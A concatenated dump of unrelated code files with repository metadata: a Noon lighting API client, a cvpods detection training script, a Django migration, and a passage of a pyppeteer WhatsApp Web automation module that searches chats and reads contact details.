if affected_entity is None:
_LOGGER.debug("UNEXPECTED: Got change notification for {}, but not an expected entity! ({}".format(guid, change))
return
_LOGGER.debug("Got change notification for '{}' - {}".format(affected_entity.name, change))
changed_fields = change.get("fields", [])
return await affected_entity.handle_update(changed_fields)
def get_entity(self, entity_id: Guid) -> NoonEntity:
return self._all_entities.get(entity_id, None)
async def _refreshEndpoints(self):
"""Update the noon endpoints for this account"""
if len(self._endpoints) > 0:
return
await self.authenticate()
async with self.session.get(DEX_URL, headers={
"Authorization": "Token {}".format(self._token)
}) as login_response:
parsed_response = await login_response.json()
# Must be a dictionary
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from get endpoints was not a dictionary - {}".format(parsed_response))
raise NoonProtocolError
# Store
try:
self._endpoints = parsed_response["endpoints"]
except KeyError:
_LOGGER.error("Unexpected endpoints response {}".format(parsed_response))
raise NoonUnknownError
def _registerEntity(self, entity: NoonEntity):
""" EVERYTHING """
self._all_entities[entity.guid] = entity
""" SPACE """
if isinstance(entity, NoonSpace):
existingEntity = self._spaces.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New space '{}' has same ID as existing space '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._spaces[entity.guid] = entity
""" LINE """
if isinstance(entity, NoonLine):
existingEntity = self._lines.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New line '{}' has same ID as existing line '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._lines[entity.guid] = entity
""" SCENE """
if isinstance(entity, NoonScene):
existingEntity = self._scenes.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New scene '{}' has same ID as existing scene '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._scenes[entity.guid] = entity
async def _refreshDevices(self):
"""Load the devices (spaces/lines) on this account."""
# Reset cache
self._spaces = {}
self._scenes = {}
self._lines = {}
# Authenticate if needed
await self.authenticate()
# Load the device details
url = "{}/api/query".format(self._endpoints["query"])
headers = {
"Authorization": "Token {}".format(self._token),
"Content-Type": "application/graphql"
}
data = "{spaces {guid name lightsOn activeScene{guid name} lines{guid lineState displayName dimmingLevel multiwayMaster { guid }} scenes{name guid}}}"
async with self.session.post(url, headers=headers, data=data) as discovery_response:
parsed_response = await discovery_response.json()
# Must be a dictionary
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from discovery was not a dictionary - {}".format(parsed_response))
raise NoonProtocolError
# Parse spaces
for space in parsed_response["spaces"]:
this_space = await NoonSpace.from_json(self, space)
_LOGGER.debug("Discovered space {}".format(this_space.name))
| 38.980392
| 165
| 0.597082
|
import logging
import asyncio
from asyncio import CancelledError
from aiohttp import ClientSession, WSMsgType, ClientTimeout, WSServerHandshakeError
import json
import datetime
import traceback
import typing
from .const import (
LOGIN_URL,
DEX_URL,
Guid
)
from .space import NoonSpace
from .line import NoonLine
from .entity import NoonEntity
from .scene import NoonScene
from .exceptions import (
NoonAuthenticationError,
NoonUnknownError,
NoonProtocolError,
NoonDuplicateIdError
)
_LOGGER = logging.getLogger(__name__)
class Noon(object):
@property
async def spaces(self) -> typing.Dict[Guid, NoonSpace]:
if self._spaces is None:
await self._refreshDevices()
return self._spaces
@property
async def lines(self) -> typing.Dict[Guid, NoonLine]:
if self._lines is None:
await self._refreshDevices()
return self._lines
@property
def session(self) -> ClientSession:
return self._session
@property
def event_stream_connected(self) -> bool:
return self._event_stream_connected
@property
def event_stream_error(self) -> str:
return self._event_stream_error
def __init__(self, session, username, password):
self._spaces = None
self._lines = None
self._scenes = None
self._all_entities = {}
self._endpoints = {}
self._event_stream_connected = False
self._event_stream_error = None
self._username = username
self._password = password
self._token = None
self._token_expires = None
self._session = session
self._websocket_task = None
async def authenticate(self) -> bool:
if self._token is not None and self._token_expires > datetime.datetime.now():
_LOGGER.debug("Using cached token, which should still be valid")
return True
_LOGGER.debug("No valid token or token expired. Authenticating...")
payload = {
"email": self._username,
"password": self._password
}
async with self.session.post(LOGIN_URL, json=payload) as login_response:
parsed_response = await login_response.json()
_LOGGER.debug("Response: {}".format(parsed_response))
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from authentication was not a dictionary")
raise NoonProtocolError
if "error" in parsed_response.keys():
raise NoonAuthenticationError
if parsed_response.get("errors") is not None:
_LOGGER.error("Multiple authentication errors from Noon - {}".format(parsed_response["errors"]))
raise NoonUnknownError
try:
self._token = parsed_response["token"]
self._token_expires = datetime.datetime.now() + datetime.timedelta(seconds = (parsed_response["lifetime"]-30))
_LOGGER.debug("Got token from Noon. Expires at {}".format(self._token_expires))
except KeyError:
_LOGGER.error("Failed to get token or lifetime from {}".format(parsed_response))
raise NoonUnknownError
await self._refreshEndpoints()
return True
async def open_eventstream(self, event_loop=None):
if event_loop is None:
_LOGGER.debug("Using main asyncio event loop")
event_loop = asyncio.get_running_loop()
assert self._websocket_task is None or self._websocket_task.cancelled(), "Already running an event stream task"
self._websocket_task = event_loop.create_task(self._internal_eventstream())
async def close_eventstream(self):
if self._websocket_task is not None and not self._websocket_task.cancelled():
_LOGGER.debug("Canceling websocket task")
self._websocket_task.cancel()
async def _internal_eventstream(self):
keep_looping = True
while keep_looping:
try:
await self.authenticate()
timeout = ClientTimeout(total=8, connect=20, sock_connect=20, sock_read=8)
event_stream_url = "{}/api/notifications".format(self._endpoints["notification-ws"])
_LOGGER.debug("Connecting to notification stream...")
async with self.session.ws_connect(event_stream_url, timeout=timeout, heartbeat=60, headers={"Authorization": "Token {}".format(self._token)}) as ws:
_LOGGER.debug("Connected to notification stream")
self._event_stream_connected = True
self._event_stream_error = None
async for msg in ws:
if msg.type == WSMsgType.TEXT:
_LOGGER.debug("Got websocket message: {}".format(msg.data))
parsed_data = json.loads(msg.data)
changes = parsed_data["data"].get("changes", [])
for change in changes:
await self._handle_change(change)
elif msg.type == WSMsgType.CLOSED:
_LOGGER.error("Socket closed")
raise NoonProtocolError("Notification stream closed unexpectedly")
elif msg.type == WSMsgType.ERROR:
_LOGGER.error("Websocket error")
raise NoonProtocolError("Unknown error on notification stream")
except CancelledError:
_LOGGER.debug("Loop canceled.")
self._event_stream_error = "Canceled"
keep_looping = False
except WSServerHandshakeError:
_LOGGER.error("Loop Fatal: Handshake error")
self._event_stream_error = "Handshake Error"
keep_looping = False
except Exception:
_LOGGER.exception("Loop Fatal: Generic exception during event loop")
self._event_stream_error = "Unknown exception - {}".format(traceback.format_exc())
keep_looping = False
finally:
_LOGGER.debug("Event stream is disconnected.")
self._event_stream_connected = False
async def _handle_change(self, change):
guid = change.get("guid", None)
if guid is None:
_LOGGER.error("Cannot process change - no GUID in {}".format(change))
return
affected_entity = self._all_entities.get(guid, None)
if affected_entity is None:
_LOGGER.debug("UNEXPECTED: Got change notification for {}, but not an expected entity! ({}".format(guid, change))
return
_LOGGER.debug("Got change notification for '{}' - {}".format(affected_entity.name, change))
changed_fields = change.get("fields", [])
return await affected_entity.handle_update(changed_fields)
def get_entity(self, entity_id: Guid) -> NoonEntity:
return self._all_entities.get(entity_id, None)
async def _refreshEndpoints(self):
if len(self._endpoints) > 0:
return
await self.authenticate()
async with self.session.get(DEX_URL, headers={
"Authorization": "Token {}".format(self._token)
}) as login_response:
parsed_response = await login_response.json()
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from get endpoints was not a dictionary - {}".format(parsed_response))
raise NoonProtocolError
try:
self._endpoints = parsed_response["endpoints"]
except KeyError:
_LOGGER.error("Unexpected endpoints response {}".format(parsed_response))
raise NoonUnknownError
def _registerEntity(self, entity: NoonEntity):
self._all_entities[entity.guid] = entity
if isinstance(entity, NoonSpace):
existingEntity = self._spaces.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New space '{}' has same ID as existing space '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._spaces[entity.guid] = entity
if isinstance(entity, NoonLine):
existingEntity = self._lines.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New line '{}' has same ID as existing line '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._lines[entity.guid] = entity
if isinstance(entity, NoonScene):
existingEntity = self._scenes.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New scene '{}' has same ID as existing scene '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self._scenes[entity.guid] = entity
async def _refreshDevices(self):
self._spaces = {}
self._scenes = {}
self._lines = {}
await self.authenticate()
url = "{}/api/query".format(self._endpoints["query"])
headers = {
"Authorization": "Token {}".format(self._token),
"Content-Type": "application/graphql"
}
data = "{spaces {guid name lightsOn activeScene{guid name} lines{guid lineState displayName dimmingLevel multiwayMaster { guid }} scenes{name guid}}}"
async with self.session.post(url, headers=headers, data=data) as discovery_response:
parsed_response = await discovery_response.json()
if not isinstance(parsed_response, dict):
_LOGGER.error("Response from discovery was not a dictionary - {}".format(parsed_response))
raise NoonProtocolError
for space in parsed_response["spaces"]:
this_space = await NoonSpace.from_json(self, space)
_LOGGER.debug("Discovered space {}".format(this_space.name))
| true
| true
|
f7052c1b310c4f6ff723bac7bb1d25d4a354f20d
| 6,206
|
py
|
Python
|
tools/train_net.py
|
lxtGH/cvpods-1
|
fb61b6a63dfa65b21a782a4fc7e15a88ce018c51
|
[
"Apache-2.0"
] | 1
|
2021-04-24T17:01:29.000Z
|
2021-04-24T17:01:29.000Z
|
tools/train_net.py
|
wondervictor/cvpods
|
614a975e5425bbaeb66bbd1ffca552d633ba89ca
|
[
"Apache-2.0"
] | null | null | null |
tools/train_net.py
|
wondervictor/cvpods
|
614a975e5425bbaeb66bbd1ffca552d633ba89ca
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# Modified by BaseDetection, Inc. and its affiliates. All Rights Reserved
"""
Detection Training Script.
This scripts reads a given config file and runs the training or evaluation.
It is an entry point that is made to train standard models in cvpods.
In order to let one script support training of many models,
this script contains logic that are specific to these built-in models and therefore
may not be suitable for your own project.
For example, your research project perhaps only needs a single "evaluator".
Therefore, we recommend you to use cvpods as an library and take
this file as an example of how to use the library.
You may want to write your own script with your datasets and other customizations.
"""
import logging
import os
import pickle as pkl
import sys
from collections import OrderedDict
from colorama import Fore, Style
import torch
from cvpods.checkpoint import DetectionCheckpointer
from cvpods.engine import DefaultTrainer, default_argument_parser, default_setup, hooks, launch
from cvpods.evaluation import build_evaluator, verify_results
from cvpods.modeling import GeneralizedRCNNWithTTA
from cvpods.utils import comm
sys.path.insert(0, '.')
from config import config # noqa: E402
from net import build_model # noqa: E402
class Trainer(DefaultTrainer):
"""
We use the "DefaultTrainer" which contains pre-defined default logic for
standard training workflow. They may not work for you, especially if you
are working on a new research project. In that case you can use the cleaner
"SimpleTrainer", or write your own training loop. You can use
"tools/plain_train_net.py" as an example.
"""
@classmethod
def build_evaluator(cls, cfg, dataset_name, dataset, output_folder=None):
"""
Create evaluator(s) for a given dataset.
This uses the special metadata "evaluator_type" associated with each builtin dataset.
For your own dataset, you can simply create an evaluator manually in your
script and do not have to worry about the hacky if-else logic here.
"""
dump_train = config.GLOBAL.DUMP_TRAIN
return build_evaluator(cfg, dataset_name, dataset, output_folder, dump=dump_train)
@classmethod
def test_with_TTA(cls, cfg, model):
logger = logging.getLogger("cvpods.trainer")
# In the end of training, run an evaluation with TTA
# Only support some R-CNN models.
logger.info("Running inference with test-time augmentation ...")
model = GeneralizedRCNNWithTTA(cfg, model)
res = cls.test(cfg, model, output_folder=os.path.join(cfg.OUTPUT_DIR, "inference_TTA"))
res = OrderedDict({k + "_TTA": v for k, v in res.items()})
return res
def stage_main(args, cfg, build):
cfg.merge_from_list(args.opts)
cfg, logger = default_setup(cfg, args)
model_build_func = build
"""
If you'd like to do anything fancier than the standard training logic,
consider writing your own training loop or subclassing the trainer.
"""
trainer = Trainer(cfg, model_build_func)
trainer.resume_or_load(resume=args.resume)
if args.eval_only:
DetectionCheckpointer(
trainer.model, save_dir=cfg.OUTPUT_DIR, resume=args.resume).resume_or_load(
cfg.MODEL.WEIGHTS, resume=args.resume)
res = Trainer.test(cfg, trainer.model)
if comm.is_main_process():
verify_results(cfg, res)
if cfg.TEST.AUG.ENABLED:
res.update(Trainer.test_with_TTA(cfg, trainer.model))
return res
# check wheather worksapce has enough storeage space
# assume that a single dumped model is 700Mb
file_sys = os.statvfs(cfg.OUTPUT_DIR)
free_space_Gb = (file_sys.f_bfree * file_sys.f_frsize) / 2**30
eval_space_Gb = (cfg.SOLVER.LR_SCHEDULER.MAX_ITER // cfg.SOLVER.CHECKPOINT_PERIOD) * 700 / 2**10
if eval_space_Gb > free_space_Gb:
logger.warning(f"{Fore.RED}Remaining space({free_space_Gb}GB) "
f"is less than ({eval_space_Gb}GB){Style.RESET_ALL}")
if cfg.TEST.AUG.ENABLED:
trainer.register_hooks(
[hooks.EvalHook(0, lambda: trainer.test_with_TTA(cfg, trainer.model))]
)
trainer.train()
if comm.is_main_process() and cfg.MODEL.AS_PRETRAIN:
# convert last ckpt to pretrain format
convert_to_pretrained_model(
input=os.path.join(cfg.OUTPUT_DIR, "model_final.pth"),
save_path=os.path.join(cfg.OUTPUT_DIR, "model_final_pretrain_weight.pkl")
)
def convert_to_pretrained_model(input, save_path):
obj = torch.load(input, map_location="cpu")
obj = obj["model"]
newmodel = {}
for k, v in obj.items():
if not k.startswith("encoder_q.") and not k.startswith("network"):
continue
old_k = k
if k.startswith("encoder_q."):
k = k.replace("encoder_q.", "")
elif k.startswith("network"):
k = k.replace("network.", "")
print(old_k, "->", k)
newmodel[k] = v.numpy()
res = {
"model": newmodel,
"__author__": "MOCO" if k.startswith("encoder_q.") else "CLS",
"matching_heuristics": True
}
with open(save_path, "wb") as f:
pkl.dump(res, f)
def main(args):
if isinstance(config, list):
assert isinstance(build_model, list) and len(config) == len(build_model)
for cfg, build in zip(config, build_model):
stage_main(args, cfg, build)
else:
stage_main(args, config, build_model)
if __name__ == "__main__":
args = default_argument_parser().parse_args()
if isinstance(config, list):
assert len(config) > 0
print("soft link first config in list to {}".format(config[0].OUTPUT_DIR))
config[0].link_log()
else:
print("soft link to {}".format(config.OUTPUT_DIR))
config.link_log()
print("Command Line Args:", args)
launch(
main,
args.num_gpus,
num_machines=args.num_machines,
machine_rank=args.machine_rank,
dist_url=args.dist_url,
args=(args,),
)
| 36.505882
| 100
| 0.679987
|
import logging
import os
import pickle as pkl
import sys
from collections import OrderedDict
from colorama import Fore, Style
import torch
from cvpods.checkpoint import DetectionCheckpointer
from cvpods.engine import DefaultTrainer, default_argument_parser, default_setup, hooks, launch
from cvpods.evaluation import build_evaluator, verify_results
from cvpods.modeling import GeneralizedRCNNWithTTA
from cvpods.utils import comm
sys.path.insert(0, '.')
from config import config
from net import build_model
class Trainer(DefaultTrainer):
@classmethod
def build_evaluator(cls, cfg, dataset_name, dataset, output_folder=None):
dump_train = config.GLOBAL.DUMP_TRAIN
return build_evaluator(cfg, dataset_name, dataset, output_folder, dump=dump_train)
@classmethod
def test_with_TTA(cls, cfg, model):
logger = logging.getLogger("cvpods.trainer")
logger.info("Running inference with test-time augmentation ...")
model = GeneralizedRCNNWithTTA(cfg, model)
res = cls.test(cfg, model, output_folder=os.path.join(cfg.OUTPUT_DIR, "inference_TTA"))
res = OrderedDict({k + "_TTA": v for k, v in res.items()})
return res
def stage_main(args, cfg, build):
cfg.merge_from_list(args.opts)
cfg, logger = default_setup(cfg, args)
model_build_func = build
trainer = Trainer(cfg, model_build_func)
trainer.resume_or_load(resume=args.resume)
if args.eval_only:
DetectionCheckpointer(
trainer.model, save_dir=cfg.OUTPUT_DIR, resume=args.resume).resume_or_load(
cfg.MODEL.WEIGHTS, resume=args.resume)
res = Trainer.test(cfg, trainer.model)
if comm.is_main_process():
verify_results(cfg, res)
if cfg.TEST.AUG.ENABLED:
res.update(Trainer.test_with_TTA(cfg, trainer.model))
return res
file_sys = os.statvfs(cfg.OUTPUT_DIR)
free_space_Gb = (file_sys.f_bfree * file_sys.f_frsize) / 2**30
eval_space_Gb = (cfg.SOLVER.LR_SCHEDULER.MAX_ITER // cfg.SOLVER.CHECKPOINT_PERIOD) * 700 / 2**10
if eval_space_Gb > free_space_Gb:
logger.warning(f"{Fore.RED}Remaining space({free_space_Gb}GB) "
f"is less than ({eval_space_Gb}GB){Style.RESET_ALL}")
if cfg.TEST.AUG.ENABLED:
trainer.register_hooks(
[hooks.EvalHook(0, lambda: trainer.test_with_TTA(cfg, trainer.model))]
)
trainer.train()
if comm.is_main_process() and cfg.MODEL.AS_PRETRAIN:
convert_to_pretrained_model(
input=os.path.join(cfg.OUTPUT_DIR, "model_final.pth"),
save_path=os.path.join(cfg.OUTPUT_DIR, "model_final_pretrain_weight.pkl")
)
def convert_to_pretrained_model(input, save_path):
obj = torch.load(input, map_location="cpu")
obj = obj["model"]
newmodel = {}
for k, v in obj.items():
if not k.startswith("encoder_q.") and not k.startswith("network"):
continue
old_k = k
if k.startswith("encoder_q."):
k = k.replace("encoder_q.", "")
elif k.startswith("network"):
k = k.replace("network.", "")
print(old_k, "->", k)
newmodel[k] = v.numpy()
res = {
"model": newmodel,
"__author__": "MOCO" if k.startswith("encoder_q.") else "CLS",
"matching_heuristics": True
}
with open(save_path, "wb") as f:
pkl.dump(res, f)
def main(args):
if isinstance(config, list):
assert isinstance(build_model, list) and len(config) == len(build_model)
for cfg, build in zip(config, build_model):
stage_main(args, cfg, build)
else:
stage_main(args, config, build_model)
if __name__ == "__main__":
args = default_argument_parser().parse_args()
if isinstance(config, list):
assert len(config) > 0
print("soft link first config in list to {}".format(config[0].OUTPUT_DIR))
config[0].link_log()
else:
print("soft link to {}".format(config.OUTPUT_DIR))
config.link_log()
print("Command Line Args:", args)
launch(
main,
args.num_gpus,
num_machines=args.num_machines,
machine_rank=args.machine_rank,
dist_url=args.dist_url,
args=(args,),
)
| true
| true
|
f7052ff86a7ae193a4261efa32bdb7d04b30b4c6
| 362
|
py
|
Python
|
core/migrations/0073_rename_name_lt_product_name.py
|
Nephrolog-lt/nephrolog-api
|
ccd2162aff02b2abfab0f285779e5d8457be1788
|
[
"Apache-2.0"
] | 2
|
2020-12-17T13:50:42.000Z
|
2021-01-09T07:01:07.000Z
|
core/migrations/0073_rename_name_lt_product_name.py
|
Nephrolog-lt/nephrolog-api
|
ccd2162aff02b2abfab0f285779e5d8457be1788
|
[
"Apache-2.0"
] | 2
|
2021-08-25T05:02:56.000Z
|
2022-01-16T18:29:49.000Z
|
core/migrations/0073_rename_name_lt_product_name.py
|
Nephrolog-lt/nephrolog-api
|
ccd2162aff02b2abfab0f285779e5d8457be1788
|
[
"Apache-2.0"
] | 1
|
2020-11-16T01:40:15.000Z
|
2020-11-16T01:40:15.000Z
|
# Generated by Django 3.2.3 on 2021-05-17 16:22
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0072_alter_product_region'),
]
operations = [
migrations.RenameField(
model_name='product',
old_name='name_lt',
new_name='name',
),
]
| 19.052632
| 47
| 0.582873
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0072_alter_product_region'),
]
operations = [
migrations.RenameField(
model_name='product',
old_name='name_lt',
new_name='name',
),
]
| true
| true
|
f705308018a1ffa77d87e188b5c43d4d6f2d194a
| 18,888
|
py
|
Python
|
wplay/utils/target_search.py
|
payal-98/whatsapp-play
|
3d667ee26c2ef6c29a12a5338e22ec9f8458a55c
|
[
"MIT"
] | 1
|
2020-03-25T12:25:40.000Z
|
2020-03-25T12:25:40.000Z
|
wplay/utils/target_search.py
|
payal-98/whatsapp-play
|
3d667ee26c2ef6c29a12a5338e22ec9f8458a55c
|
[
"MIT"
] | null | null | null |
wplay/utils/target_search.py
|
payal-98/whatsapp-play
|
3d667ee26c2ef6c29a12a5338e22ec9f8458a55c
|
[
"MIT"
] | null | null | null |
__author__ = 'Alexandre Calil Martins Fonseca, github: xandao6'
# region TUTORIAL
'''
Go to region 'FOR SCRIPTING' and use the methods in your script!
EXAMPLE OF USAGE:
from wplay.pyppeteerUtils import pyppeteerConfig as pypConfig
from wplay.pyppeteerUtils import pyppeteerSearch as pypSearch
async def my_script(target):
pages, browser = wait pyp.configure_browser_and_load_whatsapp(pypConfig.websites['whatsapp'])
await pypSearch.search_for_target_and_get_ready_for_conversation(pages[0], target)
message = pypSearch.ask_user_for_message_breakline_mode()
await pypSearch.send_message(pages[0], message)
message2 = pypSearch.ask_user_for_message()
await pypSearch.send_message(pages[0], message2)
'''
# endregion
# region IMPORTS
from wplay.utils.helpers import whatsapp_selectors_dict
from wplay.utils import Logger
from wplay.utils.helpers import logs_path
from pyppeteer.errors import ElementHandleError
# endregion
# region FOR SCRIPTING
async def search_and_select_target(page, target, hide_groups=False):
await __open_new_chat(page)
await __type_in_new_chat_search_bar(page, target)
contact_list_elements_unchecked = await __get_contacts_elements_filtered(page, target)
group_list_elements_unchecked = await __get_groups_elements_filtered(page, target, hide_groups)
contact_titles_unchecked = await __get_contacts_titles_from_elements_unchecked(page, contact_list_elements_unchecked)
group_titles_unchecked = await __get_groups_titles_from_elements_unchecked(page, group_list_elements_unchecked)
contact_list_unchecked = __zip_contact_titles_and_elements_unchecked(
contact_titles_unchecked, contact_list_elements_unchecked)
group_list_unchecked = __zip_group_titles_and_elements_unchecked(
group_titles_unchecked, group_list_elements_unchecked)
contact_tuple = __check_contact_list(target, contact_list_unchecked)
group_tuple = __check_group_list(target, group_list_unchecked)
target_tuple = __get_target_tuple(contact_tuple, group_tuple)
__print_target_tuple(target_tuple)
target_index_choosed = __ask_user_to_choose_the_filtered_target(target_tuple)
choosed_target = __get_choosed_target(target_tuple, target_index_choosed)
await __navigate_to_target(page, choosed_target)
target_focused_title = await __get_focused_target_title(page, target)
if any(choosed_target[0] in i for i in contact_tuple):
complete_target_info = await get_complete_info_on_target(page)
print_complete_target_info(complete_target_info)
await close_contact_info_page(page)
else:
__print_selected_target_title(target_focused_title)
__check_target_focused_title(page, target, target_focused_title)
await __wait_for_message_area(page)
return target_focused_title
async def search_and_select_target_without_new_chat_button(page,target, hide_groups=False):
await __type_in_chat_or_message_search(page,target)
chats_messages_groups_elements_list = await __get_chats_messages_groups_elements(page)
contact_name_index_tuple_list = await __get_contacts_matched_with_query(chats_messages_groups_elements_list)
group_name_index_tuple_list = await __get_groups_matched_with_query(chats_messages_groups_elements_list,hide_groups)
target_tuple = (contact_name_index_tuple_list,group_name_index_tuple_list)
__print_target_tuple(target_tuple)
target_index_chosen = __ask_user_to_choose_the_filtered_target(target_tuple)
#chosen_target will be a tuple (a,b) such that a is the name of the target and b is the
#index of that element in chats_messages_groups_elements_list
chosen_target = __get_choosed_target(target_tuple, target_index_chosen)
await __open_selected_chat(chosen_target[1],chats_messages_groups_elements_list)
target_name = chosen_target[0]
if any(chosen_target[0] in i for i in contact_name_index_tuple_list):
complete_target_info = await get_complete_info_on_target(page)
print_complete_target_info(complete_target_info)
await close_contact_info_page(page)
else:
__print_selected_target_title(target_name)
await __wait_for_message_area(page)
return target_name
# endregion
#region LOGGER create
logger : Logger = Logger.setup_logger('logs',logs_path/'logs.log')
#endregion
# region SEARCH AND SELECT TARGET
async def __type_in_chat_or_message_search(page,target):
try:
print(f'Looking for: {target}')
await page.waitForSelector(
whatsapp_selectors_dict['chat_or_message_search'],
visible=True,
timeout=0
)
await page.waitFor(500)
await page.type(whatsapp_selectors_dict['chat_or_message_search'], target)
await page.waitFor(3000)
except Exception as e:
print(e)
async def __get_chats_messages_groups_elements(page):
chats_messages_groups_elements_list = [] # type : list[int]
try:
chats_messages_groups_elements_list = await page.querySelectorAll\
(whatsapp_selectors_dict['chats_groups_messages_elements'])
return chats_messages_groups_elements_list
except Exception as e:
print(e)
exit()
async def __get_contacts_matched_with_query(chats_groups_messages_elements_list):
contacts_to_choose_from = [] # type : list[str , int]
get_contact_node_title_function = 'node => node.parentNode.getAttribute("title")'
for idx, element in enumerate(chats_groups_messages_elements_list):
try:
contact_name = await element.querySelectorEval(whatsapp_selectors_dict['contact_element'],get_contact_node_title_function)
contacts_to_choose_from.append((contact_name,idx))
except ElementHandleError:
# if it is not a contact element, move to the next one
continue
except Exception as e:
print(e)
return contacts_to_choose_from
async def __get_groups_matched_with_query(chats_groups_messages_elements_list,hide_groups):
groups_to_choose_from = []
if hide_groups:
return groups_to_choose_from
get_group_node_title_function = 'node => node.parentNode.getAttribute("title")'
for idx, element in enumerate(chats_groups_messages_elements_list):
try:
group_name = await element.querySelectorEval(whatsapp_selectors_dict['group_element'],
get_group_node_title_function)
groups_to_choose_from.append((group_name,idx))
except ElementHandleError:
# if it is not a contact element, move to the next one
continue
except Exception as e:
print(e)
return groups_to_choose_from
async def __open_selected_chat(target_index,chats_messages_groups_elements_list):
try:
await chats_messages_groups_elements_list[target_index].click()
except Exception as e:
print(f"This target doesn't exist! Error: {str(e)}")
exit()
async def get_complete_info_on_target(page):
contact_page_elements = []
try:
await page.waitForSelector(
whatsapp_selectors_dict['target_chat_header'],
visible=True,
timeout=3000
)
await page.click(whatsapp_selectors_dict['target_chat_header'])
contact_page_elements = await get_contact_page_elements(page)
complete_target_info = {}
await get_contact_name_info(contact_page_elements[0], complete_target_info)
await get_contact_about_and_phone(contact_page_elements[3], complete_target_info)
await get_contact_groups_common_with_target(complete_target_info, page)
except Exception as e:
print(e)
return complete_target_info
async def get_contact_page_elements(page):
contact_page_elements = []
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_info_page_elements'],
visible=True,
timeout=8000
)
contact_page_elements = await page.querySelectorAll(whatsapp_selectors_dict['contact_info_page_elements'])
except Exception as e:
print(e)
return contact_page_elements
async def get_contact_name_info(contact_name_element,complete_target_info):
try:
complete_target_info['Name'] = await contact_name_element.querySelectorEval('span > span', 'element => element.innerText')
complete_target_info['Last_seen'] = await contact_name_element.querySelectorEval('div > span:last-of-type > div > span', 'element => element.getAttribute("title")')
except:
print(f'last seen not available')
async def get_contact_about_and_phone(contact_name_element, complete_target_info):
try:
complete_target_info['About'] = await contact_name_element.querySelectorEval('div:nth-child(2) > div > div > span > span', 'element => element.getAttribute("title")')
complete_target_info['Mobile'] = await contact_name_element.querySelectorEval('div:last-of-type > div > div > span > span', 'element => element.innerText')
except Exception as e:
print(e)
async def get_contact_groups_common_with_target(complete_target_info,page):
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_info_page_group_element_heading'],
visible= True,
timeout=3000
)
if (await page.evaluate(f'document.querySelector("{whatsapp_selectors_dict["contact_info_page_group_element_heading"]}").innerText'))\
== "Groups in common":
group_elements = await page.querySelectorAll(whatsapp_selectors_dict['contact_info_page_group_elements'])
complete_target_info['Groups'] = [await ele.querySelectorEval('div>div>div:nth-child(2)>div:first-child>div>div>span', 'e => e.getAttribute("title")') for ele in group_elements]
else:
complete_target_info['Groups'] = []
except:
complete_target_info['Groups'] = []
print(f'No groups in common')
async def close_contact_info_page(page):
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_info_page_close_button'],
visible = True,
timeout = 5000
)
await page.click(whatsapp_selectors_dict['contact_info_page_close_button'])
except Exception as e:
print(e)
def print_complete_target_info(complete_target_info):
for key in complete_target_info.keys():
if key == "Groups":
print("Groups:")
print(*complete_target_info[key], sep=",")
else:
print(f'{key}: {complete_target_info[key]} ')
async def __open_new_chat(page):
await page.waitForSelector(
whatsapp_selectors_dict['new_chat_button'],
visible=True,
timeout=0
)
await page.waitFor(500)
await page.click(whatsapp_selectors_dict['new_chat_button'])
async def __type_in_new_chat_search_bar(page, target):
print(f'Looking for: {target}')
logger.info('Searching Target')
await page.waitForSelector(
whatsapp_selectors_dict['search_contact_input_new_chat'],
visible=True
)
await page.type(whatsapp_selectors_dict['search_contact_input_new_chat'], target)
await page.waitFor(3000)
async def __get_contacts_elements_filtered(page, target):
contact_list_elements_unchecked = list()
try:
await page.waitForSelector(
whatsapp_selectors_dict['contact_list_elements_filtered_new_chat'],
visible=True,
timeout=3000
)
contact_list_elements_unchecked = await page.querySelectorAll(
whatsapp_selectors_dict['contact_list_elements_filtered_new_chat']
)
except:
print(f'No contact named by "{target}"!')
logger.info('Target not found')
return contact_list_elements_unchecked
async def __get_groups_elements_filtered(page, target, hide_groups=False):
group_list_elements_unchecked = list()
if hide_groups:
return group_list_elements_unchecked
try:
await page.waitForSelector(
whatsapp_selectors_dict['group_list_elements_filtered_new_chat'],
visible=True,
timeout=3000
)
group_list_elements_unchecked = await page.querySelectorAll(
whatsapp_selectors_dict['group_list_elements_filtered_new_chat']
)
except:
print(f'No group named by "{target}"!')
logger.info('Target not found in groups')
return group_list_elements_unchecked
async def __get_contacts_titles_from_elements_unchecked(page, contact_list_elements_unchecked):
contact_titles_unchecked = []
for i in range(len(contact_list_elements_unchecked)):
contact_titles_unchecked\
.append(await page.evaluate(f'document.querySelectorAll("{whatsapp_selectors_dict["contact_list_elements_filtered_new_chat"]}")[{i}].getAttribute("title")'))
return contact_titles_unchecked
async def __get_groups_titles_from_elements_unchecked(page, group_list_elements_unchecked):
group_titles_unchecked = []
for i in range(len(group_list_elements_unchecked)):
group_titles_unchecked.append(await page.evaluate(f'document.querySelectorAll("{whatsapp_selectors_dict["group_list_elements_filtered_new_chat"]}")[{i}].getAttribute("title")'))
return group_titles_unchecked
# contact_list_unchecked is a zip (list of tuples) of contact_titles and
# contact elements, unchecked.
def __zip_contact_titles_and_elements_unchecked(contact_titles_unchecked, contact_list_elements_unchecked):
